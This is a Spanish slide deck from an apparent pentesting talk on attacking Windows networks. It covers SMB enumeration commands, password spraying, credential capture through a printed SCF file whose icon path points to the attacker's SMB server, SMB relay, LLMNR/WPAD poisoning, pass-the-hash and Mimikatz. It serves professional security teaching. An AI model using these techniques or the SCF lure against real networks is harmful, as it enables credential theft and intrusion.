Upload
websec-mexico-sc
View
366
Download
0
Embed Size (px)
Citation preview
PWNEANDO REDES INFORMÁTICAS EN UN DÍA
#CAT /ETC/ABOUT
PAULINO CALDERÓN PALETWITTER: @CALDERPWNGITHUB: GITHUB.COM/CLDRN/WWW.CALDERONPALE.COM
COSAS QUE HE APRENDIDO
• 99% DE LA VECES SERÁN REDES WINDOWS.• SE DESCONOCEN LAS VULNERABILIDADES MÁS
CRÍTICAS QUE AFECTAN A UNA ORGANIZACIÓN HASTA QUE CONTRATAN UN SERVICIO PROFESIONAL.
• NADIE SABE QUE CORRE EN SUS MÁQUINAS.• LO BARATO/RÁPIDO SALE CARO (LAS
CONFIGURACIONES DEFAULT SON MORTALES).
SMB3.0 3.02
1.02.0
2.1
SMB ES NUESTRO AMIGO
SMB ES UNO DE LOS PRINCIPALES VECTORES DE ATAQUE EN AMBIENTES WINDOWS.
GRACIAS A SMB:• OBTENER INFORMACIÓN SOBRE EL SISTEMA OPERATIVO Y DIRECTORIO ACTIVO• ROBAR CREDENCIALES DE USUARIOS• ACCEDER A CARPETAS COMPARTIDAS • PROBAR CREDENCIALES QUE OBTENGAMOS• EJECUTAR COMANDOS O BINARIOS REMOTAMENTE (PSEXEC, WMI,
POWERSHELL…)• EXISTEN MUCHAS VULNERABILIDADES EN IMPLEMENTACIONES DE SERVIDORES Y
CLIENTES…
CONTROLADORES DE DOMINIO• ES MUY COMÚN QUE LOS CONTROLADORES DE
DOMINIO PERMITAN SESIONES NULAS SOBRE SMB.• LA INFORMACIÓN QUE REVELA ESTA MALA
CONFIGURACIÓN INCLUYE USUARIOS Y GRUPOS DE DOMINIO.
• GRACIAS A ESTA VULNERABILIDAD SE PUEDE ENFOCAR EL ATAQUE EN CIERTOS USUARIOS CON PRIVILEGIOS MÁXIMOS…
OBTENIENDO INFORMACIÓN DE CONTROLADORES DE DOMINIO
LINUXENUM 0.9 GUARDA USUARIOS EN ARCHIVOS DE TEXTO DIVIDIDO POR GRUPOS. PUEDE SER USADO DIRECTAMENTE EN HERRAMIENTAS COMO NMAP O METASPLOIT.DESCARGA DESDE HTTPS://GITHUB.COM/CLDRN/ENUM4LINUX-0.9
DOMINIO\USUARIO
OBTENIENDO INFORMACIÓN DE CONTROLADORES DE DOMINIOPOLENUMOBTIENE LAS POLÍTICAS DE CONTRASEÑAS DE UNA MAQUINA.
DESCARGA DESDE HTTPS://LABS.PORTCULLIS.CO.UK/TOOLS/POLENUM/
“QUICKPWN”
• IDENTIFICAR DCS• EJECUTAR ENUM4LINUX 0.9$ENUM4LINUX –A <IP>• EJECUTAR POLENUM PARA OBTENER POLITICAS DE
CONTRASEÑAS Y BLOQUEO DE CUENTASPOLENUM <IP>• EJECUTAR ATAQUE DE DICCIONARIO UTILIZANDO LA LISTA DE
USUARIOS OBTENIDAMETASPLOIT: AUXILIARY/SCANNER/SMB/SMB_LOGINNMAP: SMB-BRUTE
CARPETAS COMPARTIDAS
• HABILITADAS PARA FACILITAR LA TRANSFERENCIA DE ARCHIVOS DENTRO DE LA ORGANIZACIÓN.
• ES POSIBLE ENCONTRAR INFORMACIÓN CONFIDENCIAL EN CARPETAS COMPARTIDAS.
“QUICKPWN”
• ENCUENTRA INFORMACIÓN RELACIONADA CON CONTRASEÑAS EN ARCHIVOS ALMACENADOS EN CARPETAS COMPARTIDAS:
HERRAMIENTA: FILE LOCATOR LITE O PRO (WWW.MYTHICSOFT.COM)
ROBO DE CREDENCIALES DE USUARIOS
• DIFERENTES TÉCNICAS PUEDEN SER UTILIZADAS PARA EL ROBO DE CREDENCIALES ABUSANDO LAS CARPETAS COMPARTIDAS.
• NO HAY PARCHE (VULNERABILIDAD POR DISEÑO).
EL CLÁSICO
ES SENCILLO LEVANTAR UN SERVIDOR SMB Y ESPERAR A QUE LOS USUARIOS QUE NOS MANDEN SU NOMBRE DE USUARIO, CONTRASEÑA CIFRADA Y DOMINIO.
VIDEO
¿QUIÉN TIENE EL TIEMPO PARA ESPERAR A QUE ALGUIEN O ALGO SE CONECTE A NOSOTROS?
RUTAS UNC
\\<EQUIPO>\<CARPETA>\<ARCHIVO>
¿DÓNDE PODEMOS USAR RUTAS UNC?
• APLICACIONES WEB/SHAREPOINT/TU PROPIO SERVIDOR WEB• SENTENCIAS SQL• DOCUMENTOS DE OFFICE• LMHOSTS.SAM <- PUEDES USARLO PARA CARGAR TU ARCHIVO HOSTS
MALICIOSO (PROTIP)• ARCHIVOS LNK• ARCHIVOS SCF <- MÁS FÁCILES QUE CREAR QUE LOS LNK (PROTIP)
“QUICKPWN”
• ENCUENTRA ALGUNA CARPETA COMPARTIDA EN LA QUE TENGAS PRIVILEGIOS DE ESCRITURA
• SUBE UN ARCHIVO QUE CONTENGA UNA RUTA UNC APUNTANDO A TU SERVIDOR SMB
• ESPERA LAS CREDENCIALES…
ARCHIVOS SCF (PRO TIP)
[SHELL]COMMAND=2ICONFILE=\\<MI IP>\SHARE\PWN.ICO[TASKBAR]COMMAND=TOGGLEDESKTOP
VIDEO
ATAQUES SMB RELAY
SI EL FIRMADO DE MENSAJES SMB ESTA DESHABILITADO, ES POSIBLE REALIZAR ATAQUES DE RELAY.
EL 99.9% DE LOS CASOS EN EQUIPOS DE TRABAJO ES VULNERABLE. (CONFIGURACIÓN DEFAULT EN WINDOWS)
VIDEO
“QUICKPWN”
• ENCUENTRA ALGUNA CARPETA COMPARTIDA EN LA QUE TENGAS PRIVILEGIOS DE ESCRITURA
• SUBE UN ARCHIVO QUE CONTENGA UNA RUTA UNC APUNTANDO A TU SERVIDOR SMB
• UTILIZA SMBRELAYX.PY PARA REDIRIGIR EL INTENTO DE CONEXIÓN A TU VÍCTIMA
¿SE PUEDE FORZAR A USUARIOS A CONECTARSE A NOSOTROS?
• YA VIMOS DIFERENTES MÉTODOS PARA RECIBIR CREDENCIALES VALIDAS PERO SE NECESITABA:• QUE USUARIOS SE CONECTEN A NOSOTROS• ACCESO DE ESCRITURA A UNA CARPETA COMPARTIDA
¿SE PUEDEN UTILIZAR TÉCNICAS DE POISONING PARA FORZAR A QUE LOS USUARIOS SE CONECTEN A NOSOTROS?
WPAD GRACIAS POR EXISTIR
• HABILITADO POR DEFAULT EN TODOS LOS EQUIPOS MICROSOFT WINDOWS
• DISEÑADO PARA AUTO-CONFIGURAR EL PROXY DE CLIENTES…
• OPCIONES DE INTERNET>LAN SETTINGS>AUTOMATICALLY DETECT SETTINGS
LLMNR Y NBT-NS
• PROTOCOLOS HABILITADO EN LA MAYORÍA DE EQUIPOS WINDOWS PARA AYUDAR CON LA RESOLUCIÓN DE NOMBRES.
• LLMNR (LINK-LOCAL MULTICAST NAME RESOLUTION) <-A PARTIR DE WINDOWS VISTA
• NBT-NS (NETBIOS NAME SERVICE)• PERMITIDOS EN MUCHOS AMBIENTES
RESTRINGIDOS. <-PROTIP
“QUICKPWN”
• DETECTA PETICIONES WPAD/LLMNR/NBT-NS EN LA RED• LEVANTA UN SERVICIO SMB PARA CAPTURAR LAS
CREDENCIALES• FORZA A USUARIOS A CONECTARSE A TÍ A TRAVÉS DE
ATAQUES DE ENVENENAMIENTO DE RECURSOS QUE SI SOLICITARON
• CAPTURA LOS HASHES
VIDEO
VIDEO
VIDEO
EL INVENCIBLE: PASS THE HASH
• LLEVA CASI 20 AÑOS EXISTIENDO. EXISTEN YA MITIGACIONES EN SISTEMAS MODERNOS PERO NO SIEMPRE SALEN BIEN LAS COSAS…
• MUCHOS PROTOCOLOS DE WINDOWS REQUIEREN CONOCER EL HASH DE LA CONTRASEÑA PERO NO LA CONTRASEÑA EN SÍ PARA AUTENTICARSE.
• MUCHAS HERRAMIENTAS LO SOPORTAN:• PTH-WINEXE, MIMIKATZ,• METASPLOIT: PSEXEC_COMMAND, PSEXEC
PTH CONTRA RDP
MICROSOFT INTRODUJO EL MODO “RESTRICTED ADMIN”, GRACIAS A ESTE MODO, AHORA ES POSIBLE UTILIZAR PTH CONTRA RDP EN WINDOWS 2012 R2 Y WINDOWS 8.1. (SOLO ADMININISTRADORES)
CONOZCAN A PSEXEC
• NOS AYUDA A IDENTIFICAR SISTEMAS QUE RE UTILICEN CONTRASEÑAS.
• SIRVE PARA EJECUTAR COMANDOS O EJECUTABLES EN MÁQUINAS A LAS QUE TENGAMOS ACCESO.
• OJO: ES MUY RUIDOSO.
VIDEO
WDIGEST
• SISTEMA DE AUTENTICACIÓN AUTOMÁTICA QUE REQUIERE QUE WINDOWS ALMACENE LA VERSIÓN EN TEXTO PLANO DE LA CONTRASEÑA.
• WCE, MIMIKATZ FTW
CREDMAP – THE CREDENTIAL MAPPER
DESARROLLADO POR ROBERTO SALGADO DE WEBSEC PARA VERIFICAR CREDENCIALES EN SERVICIOS COMO REDES SOCIALES Y SITIOS WEB
DESCARGA: HTTPS://GITHUB.COM/LIGHTOS/CREDMAP
VIDEO
WMI
• ALTERNATIVA DE PSEXEC• NO LEVANTA UN SERVICIO • NO TOCA EL DISCO DURO• EN KALI: WMIEXEC Y PTH-WMIS
PENTESTERS AMAN POWERSHELL
POWERSHELL PUEDE SER UTILIZADO PARA EJECUCIÓN DE CÓDIGO REMOTAMENTE, RECONOCIMIENTO DE LA RED, Y HASTA ESCALACIÓN DE PRIVILEGIOS.
PROYECTOS QUE VALE LA PENA MENCIONAR:• POWERSPLOIT: COLECCIÓN DE MÓDULOS UTILES PARA PENTESTING.
HTTPS://GITHUB.COM/POWERSHELLMAFIA/POWERSPLOIT/• EMPIRE: AGENTE PARA POST-EXPLOTACIÓN
HTTP://WWW.POWERSHELLEMPIRE.COM
SMB1 VS SMB2 VS SMB3
• LA MAYORÍA DE HERRAMIENTAS DE EXPLOTACIÓN REQUIEREN SMB1. (POR AHORA)
• SMB2 REDUCE EL SET DE FUNCIONES• SMB3 INCLUYE CIFRADO DE MENSAJES.
VIDEO
OTROS “QUICKPWNS”
• GOLDEN TICKET KERBEROS• SOFTWARE DESACTUALIZADO• SERVICIOS CON PERMISOS EXCESIVOS• IMPRESORAS MULTIFUNCIONALES• AMBIENTES DE DESARROLLO CONFIGURADOS INCORRECTAMENTE• SISTEMAS DE ACTUALIZACIONES INSEGUROS (*)
VIDEO
¿QUÉ OTRAS VULNERABILIDADES VALE LA PENA MENCIONAR?
SPAM
OWASP RIVIERA MAYA
NMAP: NETWORK EXPLORATION AND SECURITY AUDITING COOKBOOK 2ND EDITION
CANALES OFICIALES DE WEBSEC
• WWW: WWW.WEBSEC.MX• YOUTUBE: YOUTUBE.COM/WEBSECMX• FACEBOOK: WEBSEC.MX• TWITTER: @_WEBSEC
CONTACTO
PAULINO CALDERÓN PALETWITTER: @CALDERPWNGITHUB: GITHUB.COM/CLDRN/WWW.CALDERONPALE.COM